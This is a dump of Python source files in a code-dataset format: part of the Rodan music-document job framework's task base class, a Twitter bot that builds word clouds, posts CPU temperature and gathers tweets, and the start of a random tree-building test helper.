Try to run \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"is_list\",\n pt_name,\n j.name,\n pt.is_list,\n attrs_is_list,\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"is_list\",\n pt_name,\n j.name,\n pt.is_list,\n attrs_is_list,\n msg,\n )\n ) # noqa\n if confirm_update:\n pt.is_list = attrs_is_list\n pt.save()\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n resource_types = RodanTaskType._resolve_resource_types(\n attrs_pt[\"resource_types\"]\n )\n rt_code = set(list(map(lambda rt: rt.mimetype, resource_types))) #map works differently in py2->3, need to add list \n rt_db = set(\n list((map(lambda rt: rt.mimetype, pt.resource_types.all())))\n )\n if rt_code != rt_db:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}`\"\n \" seems to be updated: {3} --> {4}. Try to run. \"\n \"`manage.py migrate` to confirm this update.\"\n ).format(\n \"resource_types\",\n pt_name,\n j.name,\n rt_db,\n rt_code,\n msg,\n )\n )\n else:\n confirm_update = confirm(\n (\n \"The field `{0}` of {5} Port Type `{1}` of Job `{2}` \"\n \"seems to be updated: \\n{3}\\n -->\\n{4}\\n\\nConfirm \"\n \"(y/N)? \"\n ).format(\n \"resource_types\",\n pt_name,\n j.name,\n rt_db,\n rt_code,\n msg,\n )\n ) # noqa\n if confirm_update:\n pt.resource_types.clear()\n pt.resource_types.add(*resource_types)\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n del attrs_pts[idx]\n\n else: # pt exists in database but not in code. Should be deleted.\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n (\n \"The {2} Port Type `{0}` of Job `{1}` seems to be \"\n \"deleted. Try to run `manage.py migrate` to confirm this\"\n \" deletion.\"\n ).format(pt_name, j.name, msg)\n )\n else:\n confirm_delete = confirm(\n (\n \"The {2} Port Type `{0}` of Job `{1}` seems to be\"\n \" deleted. Confirm (y/N)? \"\n ).format(pt_name, j.name, msg)\n )\n if confirm_delete:\n try:\n pt.delete()\n print(\" ..deleted.\\n\\n\")\n except Exception as e:\n print(\n (\n \" ..not deleted because of an exception: {0}.\"\n \" Please fix it manually.\\n\\n\"\n ).format(str(e))\n )\n else:\n print(\" ..not deleted.\\n\\n\")\n\n # ipt exists in code but not in database. Should be added to the database.\n if attrs_pts:\n for pt in attrs_pts:\n if not UPDATE_JOBS:\n raise ImproperlyConfigured(\n \"The {2} Port Type `{0}` of Job `{1}` seems to be newly added. Try to run `manage.py migrate` to confirm this update.\".format( # noqa\n pt[\"name\"], j.name, msg\n )\n )\n else:\n confirm_update = confirm(\n \"The {2} Port Type `{0}` of Job `{1}` seems to be newly added. Confirm (y/N)? 
\".format( # noqa\n pt[\"name\"], j.name, msg\n )\n )\n if confirm_update:\n if which == \"in\":\n Model = InputPortType\n elif which == \"out\":\n Model = OutputPortType\n i = Model(\n job=j,\n name=pt[\"name\"],\n minimum=pt[\"minimum\"],\n maximum=pt[\"maximum\"],\n is_list=bool(pt.get(\"is_list\", False)),\n )\n i.save()\n resource_types = RodanTaskType._resolve_resource_types(\n pt[\"resource_types\"]\n )\n if len(resource_types) == 0:\n raise ValueError(\n (\n \"No available resource types found\"\n \" for this {1}PortType: {0}\"\n ).format(pt[\"resource_types\"], msg)\n )\n i.resource_types.add(*resource_types)\n print(\" ..updated.\\n\\n\")\n else:\n print(\" ..not updated.\\n\\n\")\n\n check_port_types(\"in\")\n check_port_types(\"out\")\n\n # Process done\n from rodan.jobs.load import job_list\n\n if attrs[\"name\"] in job_list:\n job_list.remove(attrs[\"name\"])\n\n @staticmethod\n def _resolve_resource_types(value):\n \"\"\"\n `value` should be one of:\n - a list of strings of mimetypes\n - a callable which receives one parameter (as a filter)\n\n Returns a list of ResourceType objects.\n \"\"\"\n try:\n mimelist = list(filter(\n value, ResourceType.objects.all().values_list(\"mimetype\", flat=True)\n ))\n except TypeError:\n mimelist = value\n return ResourceType.objects.filter(mimetype__in=mimelist)\n\n\nclass RodanTask(Task,metaclass=RodanTaskType):\n # __metaclass__ = RodanTaskType\n abstract = True\n\n ################################\n # Private retrieval methods\n ################################\n\n def _inputs(self, runjob, with_urls=False):\n \"\"\"\n Return a dictionary of list of input file path and input resource type.\n If with_urls=True, it also includes the resource url and thumbnail urls.\n \"\"\"\n\n def _extract_resource(resource, resource_type_mimetype=None):\n r = {\n # convert 'unicode' object to 'str' object for consistency\n \"resource_path\": str(resource.resource_file.path),\n \"resource_type\": str(\n resource_type_mimetype or resource.resource_type.mimetype\n ),\n }\n if with_urls:\n r[\"resource_url\"] = str(resource.resource_url)\n r[\"diva_object_data\"] = str(resource.diva_json_url)\n r[\"diva_iip_server\"] = getattr(rodan_settings, \"IIPSRV_URL\")\n r[\"diva_image_dir\"] = str(resource.diva_image_dir)\n return r\n\n input_objs = (\n Input.objects.filter(run_job=runjob)\n .select_related(\"resource\", \"resource__resource_type\", \"resource_list\")\n .prefetch_related(\"resource_list__resources\")\n )\n\n inputs = {}\n for input in input_objs:\n ipt_name = str(input.input_port_type_name)\n if ipt_name not in inputs:\n inputs[ipt_name] = []\n if input.resource is not None: # If resource\n inputs[ipt_name].append(_extract_resource(input.resource))\n elif input.resource_list is not None: # If resource_list\n inputs[ipt_name].append(\n list(map(\n lambda x: _extract_resource(\n x, input.resource_list.get_resource_type().mimetype\n ),\n input.resource_list.resources.all(),\n ))\n )\n else:\n raise RuntimeError(\n (\n \"Cannot find any resource or resource list on Input\" \" {0}\"\n ).format(input.uuid)\n )\n return inputs\n\n def _outputs(self, runjob):\n \"\"\"\n Return a dictionary of list of dictionary describing output information\n (resource type, resource or resource list, and original uuid).\n \"\"\"\n output_objs = (\n Output.objects.filter(run_job=runjob)\n .select_related(\"resource\", \"resource__resource_type\", \"resource_list\")\n .prefetch_related(\"resource_list__resources\")\n )\n\n outputs = {}\n for output in output_objs:\n opt_name 
= str(output.output_port_type_name)\n if opt_name not in outputs:\n outputs[opt_name] = []\n if output.resource is not None: # If resource\n outputs[opt_name].append(\n {\n \"resource_type\": str(output.resource.resource_type.mimetype),\n \"uuid\": output.uuid,\n \"is_list\": False,\n }\n )\n elif output.resource_list is not None: # If resource_list\n outputs[opt_name].append(\n {\n \"resource_type\": str(\n output.resource_list.resource_type.mimetype\n ),\n \"uuid\": output.uuid,\n \"is_list\": True,\n }\n )\n else:\n raise RuntimeError(\n (\n \"Cannot find any resource or resource list on \" \"Output {0}\"\n ).format(output.uuid)\n )\n return outputs\n\n def _settings(self, runjob):\n rj_settings = runjob.job_settings\n j_settings = Job.objects.get(name=runjob.job_name).settings\n\n for properti, definition in j_settings.get(\"properties\", {}).items():\n if \"enum\" in definition: # convert enum to integers\n rj_settings[properti] = definition[\"enum\"].index(rj_settings[properti])\n\n return rj_settings\n\n def _package_path(self):\n base_path = os.path.dirname(settings.PROJECT_PATH)\n rel_path = os.sep.join(self._package_name.split(\".\"))\n return os.path.join(base_path, rel_path) # e.g.: \"/path/to/rodan/jobs/gamera\"\n\n ########################\n # Test interface\n ########################\n def test_my_task(self, testcase):\n \"\"\"\n This method is called when executing `manage.py test test_all_jobs`.\n\n This method should call `run_my_task()` and/or `get_my_interface()` and/or\n `validate_my_user_input`. Before calling the job code, this method needs to\n construct `inputs`, `settings`, and `outputs` objects as parameters of the\n job code.\n\n Its own parameter `testcase` refers to the Python TestCase object. Aside from\n assertion methods like `assertEqual()` and `assertRaises()`, it provides\n `new_available_path()` which returns a path to a nonexist file. `test_my_task`\n method can thus create an input file and pass into the job code.\n \"\"\"\n print(\n \"WARNING: {0}.test_my_task() is not implemented.\".format(\n type(self).__module__\n )\n )\n\n #######################\n # Utilities\n #######################\n class WAITING_FOR_INPUT(object):\n \"\"\"\n As a possible return value of run_my_task() to indicate the interactive phase\n of the job, and return value of validate_my_user_input() to indicate the job\n staying in interactive phase.\n\n It holds the settings that need to be updated. The name of the settings must\n start with \"@\" in order to be distinguished from original settings. Keys not\n starting with \"@\" will be removed. 
Example:\n\n            return self.WAITING_FOR_INPUT({'@field1': newVal1, '@field2': newVal2})\n\n        The `response` attribute is for the manual phase returning HTTP responses.\n        \"\"\"\n\n        def __init__(self, settings_update={}, response=None):\n            self.settings_update = {}\n            self.response = response\n            for k, v in settings_update.items():\n                if isinstance(k, str) and k.startswith(\"@\"):  # noqa\n                    self.settings_update[k] = v\n\n            # Keys without the \"@\" prefix are dropped silently; no error is raised.\n\n    def tempdir(self):\n        \"\"\"\n        A shortcut for all jobs.\n\n        Usage:\n            with self.tempdir() as tempdir:\n        \"\"\"\n        return tempfile.TemporaryDirectory()\n\n    #############################################\n    # Automatic phase -- running in Celery thread\n    #############################################\n    def run(self, runjob_id):\n        \"\"\"\n        Code here is run asynchronously in Celery thread.\n\n        To prevent re-creating a deleted object, any write to database should use\n        one of the following:\n        + `queryset.update()`\n        + `obj.save(update_fields=[...])`\n        + `obj.file_field.save(..., save=False)` + `obj.save(update_fields=['file_field'])`\n\n        instead of:\n        + `obj.save()`\n        + `obj.file_field.save(..., save=True)`\n        \"\"\"\n        runjob = RunJob.objects.get(uuid=runjob_id)\n        settings = self._settings(runjob)\n        inputs = self._inputs(runjob)\n\n        start_time = time.time()\n\n        with self.tempdir() as temp_dir:\n            outputs = self._outputs(runjob)\n\n            # build argument for run_my_task and mapping dictionary\n            arg_outputs = {}\n            # retains where originally assigned paths are from... prevent jobs changing them\n            temppath_map = {}\n\n            for opt_name, output_list in outputs.items():\n                if opt_name not in arg_outputs:\n                    arg_outputs[opt_name] = []\n                for output in output_list:\n                    if output[\"is_list\"] is False:\n                        output_res_tempname = str(uuid.uuid4())\n                        output_res_temppath = os.path.join(\n                            temp_dir, output_res_tempname\n                        )\n                        arg_outputs[opt_name].append(\n                            {\n                                \"resource_path\": output_res_temppath,\n                                \"resource_type\": output[\"resource_type\"],\n                            }\n                        )\n                        output[\"resource_temp_path\"] = output_res_temppath\n                        temppath_map[output_res_temppath] = output\n                    else:\n                        # create a folder for them\n                        output_res_tempname = str(uuid.uuid4())\n                        output_res_tempfolder = (\n                            os.path.join(temp_dir, output_res_tempname) + os.sep\n                        )\n                        os.mkdir(output_res_tempfolder)\n                        arg_outputs[opt_name].append(\n                            {\n                                \"resource_folder\": output_res_tempfolder,\n                                \"resource_type\": output[\"resource_type\"],\n                            }\n                        )\n                        output[\"resource_temp_folder\"] = output_res_tempfolder\n                        temppath_map[output_res_tempfolder] = output\n            logger.info(\"started running the task!\")\n            retval = self.run_my_task(inputs, settings, arg_outputs)\n            logger.info((\"ran the task and the returned object is {0}\").format(retval))\n\n            if isinstance(retval, self.WAITING_FOR_INPUT):\n                logger.info((\"the settings_update field is: {0}\").format(retval.settings_update))\n                try:\n                    if type(retval.settings_update[\"@settings\"]) == bytes:\n                        retval.settings_update[\"@settings\"] = retval.settings_update[\"@settings\"].decode(\"UTF-8\")\n                except KeyError:\n                    pass\n                settings.update(retval.settings_update)\n                logger.info((\"After being updated the settings_update field is: {0}\").format(retval.settings_update))\n\n                # In Python 3 the \"@settings\" payload (e.g. from the last step of\n                # the Biollante job) can arrive as bytes, so it is decoded to a\n                # UTF-8 string above before the settings are stored as JSON.
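\n                # A hedged illustration (key and value invented): a job returning\n                #     self.WAITING_FOR_INPUT({'@settings': b'{\"threshold\": 42}'})\n                # has its payload normalised to the text form '{\"threshold\": 42}'\n                # before being written back into runjob.job_settings below.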
biollante is working?\n # before updating have to decode\n\n runjob.status = task_status.WAITING_FOR_INPUT\n runjob.job_settings = settings\n runjob.error_summary = None\n runjob.error_details = None\n runjob.celery_task_id = None\n runjob.save(\n update_fields=[\n \"status\",\n \"job_settings\",\n \"error_summary\",\n \"error_details\",\n \"celery_task_id\",\n ]\n )\n\n # Send an email to owner of WorkflowRun\n wfrun_id = RunJob.objects.filter(pk=runjob_id).values_list(\n \"workflow_run__uuid\", flat=True\n )[0]\n workflow_run = WorkflowRun.objects.get(uuid=wfrun_id)\n user = WorkflowRun.objects.get(uuid=wfrun_id).creator\n if not rodan_settings.TEST:\n if (\n user.email\n and rodan_settings.EMAIL_USE\n and user.user_preference.send_email\n ):\n to = [user.email]\n email_template = \"emails/workflow_run_waiting_for_user_input.html\"\n context = {\"name\": workflow_run.name, \"description\": workflow_run.description}\n registry.tasks[\"rodan.core.send_templated_email\"].apply_async((to, email_template, context))\n\n return \"WAITING FOR INPUT\"\n else:\n # ensure the runjob did not produce any error\n try:\n # err = self.error_details\n if len(self.error_details) > 0:\n raise RuntimeError(self.error_details)\n except AttributeError:\n pass\n\n # ensure the job has produced all output files\n for opt_name, output_list in outputs.items():\n for output in output_list:\n if output[\"is_list\"] is False:\n if not os.path.isfile(output[\"resource_temp_path\"]):\n raise RuntimeError(\n (\n \"The job did not produce the output file\"\n \" for {0}.\\n\\n{1}\"\n ).format(opt_name, outputs)\n )\n else:\n files = [\n f\n for f in os.listdir(output[\"resource_temp_folder\"])\n if os.path.isfile(\n os.path.join(output[\"resource_temp_folder\"], f)\n )\n ] # noqa\n if len(files) == 0:\n raise RuntimeError(\n (\n \"The job did not produce any output files \"\n \"for the resource list for {0}\"\n ).format(opt_name)\n )\n\n for temppath, output in temppath_map.items():\n if output[\"is_list\"] is False:\n with open(temppath, \"rb\") as f:\n resource = Output.objects.get(uuid=output[\"uuid\"]).resource\n # Django will resolve the path according to upload_to\n resource.resource_file.save(temppath, File(f), save=False)\n resource.save(update_fields=[\"resource_file\"])\n if resource.resource_type.mimetype.startswith(\"image\"):\n # call synchronously\n # registry.tasks['rodan.core.create_thumbnails'].run(resource.uuid.hex)\n\n # call synchronously\n # registry.tasks['rodan.core.create_diva'].run(resource.uuid.hex)\n\n # call asynchronously\n registry.tasks[\"rodan.core.create_diva\"].si(\n resource.uuid.hex\n ).apply_async(\n queue=\"celery\"\n ) # noqa\n else:\n files = [\n ff\n for ff in os.listdir(output[\"resource_temp_folder\"])\n if os.path.isfile(\n os.path.join(output[\"resource_temp_folder\"], ff)\n )\n ]\n files.sort() # alphabetical order\n\n resourcelist = Output.objects.get(\n uuid=output[\"uuid\"]\n ).resource_list\n for index, ff in enumerate(files):\n with open(\n os.path.join(output[\"resource_temp_folder\"], ff), \"rb\"\n ) as f:\n resource = Resource(\n project=resourcelist.project,\n resource_type=resourcelist.resource_type,\n name=ff,\n description=\"Order #{0} in ResourceList {1}\".format(\n index, resourcelist.name\n ),\n origin=resourcelist.origin,\n )\n resource.save()\n\n # Django will resolve the path according to upload_to\n resource.resource_file.save(ff, File(f), save=False)\n resource.save(update_fields=[\"resource_file\"])\n if 
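# Two-step save (see the docstring of run() above): the file is written\n                                # with save=False and then only the changed field is persisted, so a\n                                # concurrently deleted row is never re-created by a full save().\n                                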
if resource.resource_type.mimetype.startswith(\"image\"):\n                                    # call synchronously\n                                    # registry.tasks['rodan.core.create_thumbnails'].run(resource.uuid.hex)\n\n                                    # call synchronously\n                                    registry.tasks[\"rodan.core.create_diva\"].run(\n                                        resource.uuid.hex\n                                    )\n\n                                    # call asynchronously\n                                    # registry.tasks['rodan.core.create_diva'].si(resource.uuid.hex).apply_async(queue=\"celery\")  # noqa\n                                resourcelist.resources.add(resource)\n\n                runjob.status = task_status.FINISHED\n                runjob.error_summary = None\n                runjob.error_details = None\n                runjob.celery_task_id = None\n                runjob.save(\n                    update_fields=[\n                        \"status\",\n                        \"error_summary\",\n                        \"error_details\",\n                        \"celery_task_id\",\n                    ]\n                )\n\n                # Update workflow run description with job info\n                wall_time = time.time() - start_time\n                try:\n                    snapshot_info = \"\\n\\n{0}:\\n  name: \\\"{1}\\\"\\n  wall_time: \\\"{2}\\\"\\n\".format(\n                        str(runjob.uuid),\n                        runjob.job_name,\n                        time.strftime(\"%H:%M:%S\", time.gmtime(wall_time))\n                    )\n\n                    if len(settings) > 0:\n                        snapshot_info += \"  settings:\\n\"\n                        for key, value in settings.items():  # dict.iteritems() does not exist in Python 3\n                            snapshot_info += \"    {0}: {1}\\n\".format(str(key), str(value))\n\n                    input_qs = Input.objects.filter(run_job=runjob)\n                    if input_qs.count() > 0:\n                        snapshot_info += \"  inputs:\\n\"\n                        for input in input_qs:\n                            snapshot_info += \"  - uuid: {0}\\n\" \\\n                                .format(str(input.resource.uuid))\n                            snapshot_info += \"    name: \\\"{0}\\\"\\n\" \\\n                                .format(input.resource.name)\n\n                    output_qs = Output.objects.filter(run_job=runjob)\n                    if output_qs.count() > 0:\n                        snapshot_info += \"  outputs:\\n\"\n                        for output in output_qs:\n                            snapshot_info += \"  - uuid: {0}\\n\" \\\n                                .format(str(output.resource.uuid))\n                            snapshot_info += \"    name: \\\"{0}\\\"\\n\" \\\n                                .format(output.resource.name)\n\n                    snapshot_info += \"\\n\"\n\n                    with transaction.atomic():\n                        atomic_wfrun = WorkflowRun.objects.select_for_update() \\\n                            .get(uuid=runjob.workflow_run.uuid)\n                        if atomic_wfrun.description is None:\n                            atomic_wfrun.description = \"\"\n                        atomic_wfrun.description += snapshot_info\n                        atomic_wfrun.save(update_fields=[\"description\"])\n                except AttributeError:  # This happens during tests where not all fields are set\n                    pass\n                except Exception as e:\n                    print(e)\n\n                # Call master task.\n                master_task = registry.tasks[\"rodan.core.master_task\"]\n                wfrun_id = str(runjob.workflow_run.uuid)\n                mt_retval = master_task.si(wfrun_id).apply_async(queue=\"celery\")\n                return \"FINISHED | master_task: {0}\".format(mt_retval)\n\n    def run_my_task(self, inputs, settings, outputs):\n        raise NotImplementedError()\n\n    def my_error_information(self, exc, traceback):\n        raise NotImplementedError()\n\n    def on_failure(self, exc, task_id, args, kwargs, einfo):\n        runjob_id = args[0]\n\n        update = self._add_error_information_to_runjob(exc, einfo)\n        update[\"status\"] = task_status.FAILED\n        update[\"celery_task_id\"] = None\n        RunJob.objects.filter(pk=runjob_id).update(**update)\n        wfrun_id = RunJob.objects.filter(pk=runjob_id).values_list(\n            \"workflow_run__uuid\", flat=True\n        )[0]\n        WorkflowRun.objects.filter(uuid=wfrun_id).update(status=task_status.FAILED)\n\n        # Send an email to the owner of the WorkflowRun\n        workflow_run = WorkflowRun.objects.get(uuid=wfrun_id)\n        user = WorkflowRun.objects.get(uuid=wfrun_id).creator\n        if not rodan_settings.TEST:\n            if (\n                user.email\n                and rodan_settings.EMAIL_USE\n                and user.user_preference.send_email\n            ):\n                to = [user.email]\n                email_template = \"rodan/email/workflow_run_failed.html\"\n                context = {\"name\": workflow_run.name, \"description\": workflow_run.description}\n                registry.tasks[\"rodan.core.send_templated_email\"].apply_async((to, email_template, context))\n\n    
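# Illustrative only (not Rodan's own code): a subclass would typically\n    # implement the hook consumed by _add_error_information_to_runjob() below\n    # along these lines:\n    #\n    #     def my_error_information(self, exc, traceback):\n    #         return {\"error_summary\": \"{0}: {1}\".format(type(exc).__name__, exc),\n    #                 \"error_details\": traceback}\n\n    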
def _add_error_information_to_runjob(self, exc, einfo):\n        # Any job using the default on_failure method can define a my_error_information\n        # method, which takes an exception and a traceback string and returns a\n        # dictionary containing 'error_summary' and 'error_details'.\n        # This is to allow pretty formatting of error messages in the client.\n        # If any exception is raised while retrieving the values, the default\n        # values are used for both fields.\n        try:\n            err_info = self.my_error_information(exc, einfo.traceback)\n            err_summary = err_info[\"error_summary\"]\n            err_details = err_info[\"error_details\"]\n            if rodan_settings.TRACEBACK_IN_ERROR_DETAIL:\n                err_details = str(err_details) + \"\\n\\n\" + str(einfo.traceback)\n        except Exception as e:\n            logger.warning(\n                (\n                    \"The my_error_information method is not implemented properly\"\n                    \" (or not implemented at all). Exception: \"\n                )\n            )\n            logger.warning(\"{0}: {1}\".format(e.__class__.__name__, e.__str__()))\n            logger.warning(\"Using default sources for error information.\")\n            err_summary = \"{0}: {1}\".format(type(exc).__name__, str(exc))\n            err_details = einfo.traceback\n\n        return {\"error_summary\": err_summary, \"error_details\": err_details}\n\n    ##########################################\n    # Manual phase -- running in Django thread\n    ##########################################\n    def get_interface(self, runjob_id):\n        global _django_template_cache\n\n        runjob = RunJob.objects.get(uuid=runjob_id)\n        inputs = self._inputs(runjob, with_urls=True)\n        settings = self._settings(runjob)\n\n        partial_template_file, context = self.get_my_interface(inputs, settings)\n\n        if isinstance(partial_template_file, Template):  # only in dummy_manual_job!\n            return (partial_template_file, context)\n\n        template_file = os.path.join(self._package_path(), partial_template_file)\n\n        if template_file in _django_template_cache:\n            return (_django_template_cache[template_file], context)\n        else:\n            with open(template_file, \"r\") as f:\n                t = Template(f.read())\n                # cache per file; assigning the Template directly would have\n                # overwritten the whole cache dict\n                _django_template_cache[template_file] = t\n                return (t, context)\n\n    def get_my_interface(self, inputs, settings):\n        \"\"\"\n        inputs will contain:\n            resource_path, resource_type, resource_url\n\n        Should return: (template, context). template is the path (relative to the\n        package folder) of the interface HTML template file (in Django template\n        language), and context should be a dictionary.\n\n        Could raise self.ManualPhaseException.\n        \"\"\"\n        raise NotImplementedError()\n\n    def validate_user_input(self, runjob_id, user_input):\n        runjob = RunJob.objects.get(uuid=runjob_id)\n        inputs = self._inputs(runjob)\n        settings = self._settings(runjob)\n\n        try:\n            return self.validate_my_user_input(inputs, settings, user_input)\n        except self.ManualPhaseException:\n            raise\n\n    def validate_my_user_input(self, inputs, settings, user_input):\n        \"\"\"\n        inputs will contain:\n            resource_path, resource_type\n\n        Could raise self.ManualPhaseException.\n\n        Should return a dictionary of settings updates. The keys should start with\n        '@' or they will be discarded.\n        \"\"\"\n        raise NotImplementedError()\n\n    
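# A minimal sketch of a subclass implementation (field names are hypothetical):\n    #\n    #     def validate_my_user_input(self, inputs, settings, user_input):\n    #         if \"threshold\" not in user_input:\n    #             raise self.ManualPhaseException(\"threshold is required\")\n    #         return {\"@threshold\": user_input[\"threshold\"]}\n\n    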
class ManualPhaseException(CustomAPIException):\n        def __init__(self, errmsg):\n            super(RodanTask.ManualPhaseException, self).__init__(\n                errmsg, status=status.HTTP_400_BAD_REQUEST\n            )\n\n\n@contextlib.contextmanager\ndef TemporaryDirectory():\n    \"\"\"\n    Temporary directory with automatic cleanup.\n    http://stackoverflow.com/questions/13379742/right-way-to-clean-up-a-temporary-folder-in-python-class\n    \"\"\"\n    temp_dir = tempfile.mkdtemp()\n    try:\n        yield temp_dir\n    finally:\n        try:\n            shutil.rmtree(temp_dir)\n        except OSError:\n            raise Exception(\"Could not clean up temporary directory: {0}\".format(temp_dir))\n\n\ndef confirm(prompt, default=True):\n    if os.environ.get(\"RODAN_NON_INTERACTIVE\") == \"true\":\n        return default\n    else:\n        return input(prompt).lower() == \"y\"\n\n\n_django_template_cache = {}\n","repo_name":"DDMAL/Rodan","sub_path":"rodan-main/code/rodan/jobs/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":51976,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"54"}
{"seq_id":"72587035683","text":"#!/usr/bin/python3\n# -*- coding:utf8 -*-\n\nfrom Bot import Bot\nimport os\nimport datetime\nfrom datetime import date\nimport pandas as pd\nimport time\nimport sys\nimport tweepy  # needed for tweepy.error.TweepError in download_tweets()\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud, STOPWORDS\nfrom scipy.misc import imread  # NOTE: removed in SciPy >= 1.2; imageio.imread is a drop-in replacement\nimport random\n\nprint(\"Creating instances...\")\nbot = Bot()\n\ndef grey_color_func(word, font_size, position, orientation, random_state=None, **kwargs):\n    return \"hsl(0, 0%%, %d%%)\" % random.randint(60, 100)\n\ndef generateWordCloud():\n\n    country = \"Ireland\"\n\n    f = open(\"tweets\", \"w\")\n    tweets = bot.getTweetsByCountry(country)\n    for status in tweets:\n        f.write(bot.nlp.cleanText(bot.getTweetByID(status.id).text))\n    \n    # print(a[0]._json['text'])\n\n    f.close()\n\n    words = \" \"\n    f = open(\"tweets\", \"r\")\n    for line in f:\n        words = words + line\n    \n    f.close()  # close() must be called, not merely referenced\n    \n    stopwords = {\"will\"}\n\n    logomask = imread(\"cloud.png\")\n\n    wordcloud = WordCloud(\n            stopwords=STOPWORDS.union(stopwords),\n            background_color=\"black\",\n            mask=logomask,\n            max_words=500,\n            width=1800,\n            height=1400\n            ).generate(words)\n\n    plt.imshow(wordcloud.recolor(color_func=grey_color_func, random_state=3))\n    plt.axis(\"off\")\n    plt.savefig(\"./tweetcloud2.png\", dpi=300)\n\n    bot.postImg(\"./tweetcloud2.png\", \"Here's a word cloud test, most spoken words in \" + country)\n    plt.show()\n\n
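# Note: WordCloud.recolor() above calls grey_color_func() once per word; each\n# call returns an HSL string such as \"hsl(0, 0%, 73%)\", i.e. a random light grey.\n\n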
def postTemperature():\n    print(\"Retrieving temperature...\")\n    # vcgencmd prints e.g. \"temp=53.0'C\"; splitting on '=' keeps the value part\n    temp = os.popen(\"/opt/vc/bin/vcgencmd measure_temp\").read().split(\"=\")[1]\n    data = time.ctime()\n\n\n    bot.post(\"XMechina Bot, on \"+str(data)+\". Current CPU temperature: \" + temp)\n\ndef reply():\n    tweets = bot.getTweets()\n    _id = tweets[0]._json['id_str']\n    user = tweets[0]._json['user']['screen_name']\n    bot.reply(\"Reply text\", _id, user)\n\ndef getTweetsByDate(user, startDate, endDate):\n    tweets = bot.getTweetsByDate(user, startDate, endDate)\n    # bot.writeCsv(tweets)\n    # bot.showContentTweets(tweets)\n    return tweets\n\ndef getTimeLineTweets():\n    lFinal = [] \n    tweets = bot.getTweets()\n    # bot.writeCsv(tweets)\n    # bot.showContentTweets(tweets, classify=False)\n    return tweets\n\ndef getTweetsByUser(user):\n    bot.getTweetsByUser(user)\n\ndef getTweetById(id):\n    return bot.getTweetByID(id)  # without this return, download_tweets() always saw None\n\n\ndef download_tweets(id_file, sentiment):\n    l = []\n    with open(id_file) as infile:\n        for tweet_id in infile:\n            tweet_id = tweet_id.strip()\n\n            # if l.exist_tweet(tweet_id):\n            #     print(\"tweet with id:\", tweet_id, \"has already been captured\")\n            #     continue\n\n            try:\n                tweet = getTweetById(tweet_id)\n                if tweet is None:\n                    print(\"No id\")\n                else:\n                    l.append([tweet, sentiment])\n            except tweepy.error.TweepError:\n                print(\"tweet with id:\", tweet_id, \"is not available\")\n\n    print(l)\n    time.sleep(0.1)\n\n# print(\"Capturing positive tweets ...\")\n# download_tweets(\"tpositivos.txt\", 1)\n\n# print(\"Capturing negative tweets ...\")\n# download_tweets(\"tnegativos.txt\", 0)\n# postTemperature()\n# getTweetsByUser(\"folha\")\n# bot.getTrendTopics()\n# getTimeLineTweets()\n# getTweetsByDate(\"folha\", (2020, 3, 27, 0, 0, 0), (2020, 3, 28, 12, 0, 0))\n\n# generateWordCloud()\n\ntweetsUsers = []\ntFinal = []\ntbd = []\ntweets = getTimeLineTweets()\n\nfor i in tweets:\n    user = i._json[\"user\"][\"screen_name\"]\n    tweetsUsers.append(user)\n\ntweetsUsers = list(set(tweetsUsers))\nfor i in tweetsUsers:\n    print(i)\n    tbd += getTweetsByDate(i, (2020, 9, 11, 0, 0, 0), (2020, 10, 11, 18, 0, 0))\n    \nbot.writeCsv(tbd)\n\nprint(\"Done\")","repo_name":"FireStrings/twitterBot","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"43895391869","text":"#!/usr/bin/python\n\nfrom tree import Tree, Node\nimport random as r\n\nnames = []\n\ndef random_place ( tree ):\n    # seed the RNG (with no argument, Python seeds from the current time)\n    r.seed()\n    cur_ptr = tree.root_node\n    for i in range(r.randrange(1, 15)):\n        if not cur_ptr.isLeaf():\n            if cur_ptr is tree.root_node:\n                cur_ptr = cur_ptr.children[0]\n            elif r.randrange(1, 10) < 5:\n                break\n            else:\n                cur_ptr = cur_ptr.children[r.randrange(len(cur_ptr.children))]\n            # if it's an action we can't add a child to it\n            if cur_ptr.m_type.index > 3:\n                cur_ptr = cur_ptr.parent\n                i = i - 1  # NOTE: reassigning the loop variable does not add an extra iteration\n        else:\n            if cur_ptr.m_type.index > 3:\n                cur_ptr = cur_ptr.parent\n                i = i - 1\n            else:\n                break\n\n    num = r.randrange(3) + 1\n\n    if cur_ptr is tree.root_node and num == 3:\n        num = r.randrange(2) + 1\n\n    robot = 0\n    node_num = tree.getNextNum()\n\n    preceeding_0s = ''\n\n    if ( node_num / 10 ) < 1:\n        preceeding_0s = '00'\n    elif ( node_num / 100) < 1:\n        preceeding_0s = '0'\n\n    name = ''\n    if num == 4:\n        name = name + 'Move_To'\n    elif num == 3:\n        name = name + 'AND'\n    elif num == 2:\n        name = name + 'OR'\n    else:\n        name = name + 'THEN'\n\n    name = name + '_' + str(num) + '_' + str(robot) + '_' + preceeding_0s + str(node_num)\n\n    names.append(name)\n\n    tree.AddNode([cur_ptr, num, True])\n\n
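# Generated names follow the pattern <KIND>_<num>_<robot>_<zero-padded id>, e.g.\n# \"AND_3_0_042\"; the test below looks these exact names up again with\n# findNodeByName(), occasionally salting in names that cannot exist.\n\n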
